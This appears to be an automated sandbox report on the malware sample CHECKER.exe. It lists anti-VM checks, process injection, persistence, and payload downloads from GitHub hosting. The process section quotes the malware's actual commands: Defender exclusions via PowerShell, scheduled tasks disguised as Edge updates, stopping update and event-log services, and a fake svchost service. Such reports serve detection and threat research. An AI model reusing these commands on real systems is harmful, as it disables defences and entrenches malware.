Malware Analysis Report

2025-03-14 22:29

Sample ID 240407-23qxaahd66
Target CHECKER.exe
SHA256 38fcbc520ffdd2c818cc0a0cc662db028994647603c5ede66ddb16aa5879ec6c
Tags: evasion, persistence
Score: 9/10

Analysis Overview

Score: 9/10

SHA256: 38fcbc520ffdd2c818cc0a0cc662db028994647603c5ede66ddb16aa5879ec6c

Threat Level: Likely malicious

The file CHECKER.exe was found to be: Likely malicious.

Malicious Activity Summary

Tags: evasion, persistence

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Creates new service(s)

Stops running service(s)

Looks for VMWare Tools registry key

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-04-07 23:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-04-07 23:06

Reported: 2024-04-07 23:09

Platform: win10-20240404-en

Max time kernel: 150s

Max time network: 143s

Command Line

winlogon.exe

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeChecker = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CHECKER.exe" C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\EdgeUpdater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\audiodg.exe" C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx c:\windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4516 set thread context of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4448 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4448 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4448 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4448 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Users\Admin\AppData\Local\Temp\audiodg.exe
PID 4448 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Users\Admin\AppData\Local\Temp\audiodg.exe
PID 4448 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 3316 wrote to memory of 4204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 3316 wrote to memory of 4204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 484 wrote to memory of 580 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 484 wrote to memory of 640 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 484 wrote to memory of 740 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 484 wrote to memory of 900 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 484 wrote to memory of 1016 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\dwm.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 484 wrote to memory of 352 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 692 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 484 wrote to memory of 892 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 1068 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 1096 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 1164 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 1208 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 1252 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s nsi

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s EventSystem

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Users\Admin\AppData\Local\Temp\CHECKER.exe

"C:\Users\Admin\AppData\Local\Temp\CHECKER.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CHECKER.exe'"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCore{5GC93CA01-CJ51-H34A-F4K1-EC0217BD138C}" /TR "C:\Users\Admin\AppData\Local\Temp\CHECKER.exe" /RL HIGHEST /F

C:\Users\Admin\AppData\Local\Temp\audiodg.exe

C:\Users\Admin\AppData\Local\Temp\audiodg.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCore{3FD61DA67-EE83-4DEC-A42C-EC0217BD120C}" /TR "C:\Users\Admin\AppData\Local\Temp\audiodg.exe" /RL HIGHEST /F

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "svchost"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "svchost" binpath= "C:\ProgramData\RunDLL\taskhostw.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "svchost"

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2wunhuih.utp.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\audiodg.exe

MD5 047ece692744926c57a5cf74ec892b2a
SHA1 33c2fb7f524056a12f75bd07854818650ce351a3
SHA256 2b46c5609e8aede8c919b9b5d80ac7dadddb288eb7a8ee49a1e8bda0958c81a7
SHA512 31f4a8f66d299f858a41b0e9ba8d8539af8e65c30975b66212f3d57b45432b23bd868f4b75b74e7f679c4a0cdf5d728a96a10efe8f605097ec4e16433d385a41

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6e00909a940924dcb736787715d1e55
SHA1 f6b640080777d173cea6c2d5eed9c2138cac24d1
SHA256 a00e099601428a75e958f111b61a739c3ca6c6a89919a416a4a6a6a07734f9f8
SHA512 b97d0014a336baca090a2c23e52ecd4b4d87bad9d20a29ea95d6400eef963a82db6ab8b0c1b407368cf25fb84c7e4312d02b3423600b58b11f6965c81095a416
